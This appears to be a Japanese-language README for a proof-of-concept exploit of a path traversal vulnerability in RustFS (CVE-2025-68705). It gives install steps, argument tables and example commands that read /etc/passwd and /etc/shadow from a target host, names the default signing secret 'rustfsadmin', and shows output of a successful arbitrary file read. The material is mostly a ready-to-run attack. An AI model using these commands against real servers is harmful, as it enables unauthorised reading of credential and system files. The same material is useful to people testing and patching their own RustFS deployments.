
CVE-2025-68705 RustFS パストラバーサル脆弱性チェック
このスクリプトは、RustFS のパストラバーサル(ディレクトリトラバーサル)脆弱性(CVE-2025-68705)を悪用し、サーバー上の任意のファイルを読み取ることを可能にします。
requirements.txt を参照してくださいgit clone https://github.com/yourusername/CVE-2025-68705.git
cd CVE-2025-68705
pip install -r requirements.txt
python exp.py -H <host> -p <port> -f <file_path> [-s <secret>]
| 引数 | 説明 |
|---|---|
-H, --host | ターゲットホストのIPアドレスまたはホスト名 |
-p, --port | ターゲットのポート番号 |
-f, --file | 読み取るファイルパス(--check-only 使用時はオプション) |
python exp.py -H 192.168.1.128 -p 9000 -f /etc/passwd
python exp.py -H 192.168.1.128 -p 9000 -f /etc/shadow -o 0 -l 1024
python exp.py -H 192.168.1.128 -p 9000 -f /etc/hosts -s customsecret
python exp.py -H 192.168.1.128 -p 9000 --check-only
python exp.py -H 192.168.1.128 -p 9000 -f /etc/passwd -o 100 -l 200
python ./exp.py -H 192.168.1.128 -p 19010 -f ../../../../etc/hosts -o 0 -l 100
[*] Target: 192.168.1.128:19010
[*] Secret: rustfsadmin
--------------------------------------------------
[*] Checking for CVE-2025-68705 vulnerability...
[*] Exploiting CVE-2025-68705 against 192.168.1.128:19010
[*] Reading file: ../../../../etc/passwd
[+] Target is VULNERABLE!
--------------------------------------------------
[*] Exploiting CVE-2025-68705 against 192.168.1.128:19010
[*] Reading file: ../../../../../../../../etc/hosts
[+] Successfully read file!
[+] File content (offset=0, length=100):
--------------------------------------------------
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastp
このプロジェクトは MIT ライセンスの下でライセンスされています。詳細は LICENSE ファイルを参照してください。
| 引数 | 説明 | デフォルト |
|---|
-s, --secret | 署名用のシークレットキー | rustfsadmin |
-o, --offset | ファイル読み取りオフセット | 0 |
-l, --length | 読み取るバイト数 | 4096 |
--check-only | ターゲットが脆弱かどうかのみ確認する | - |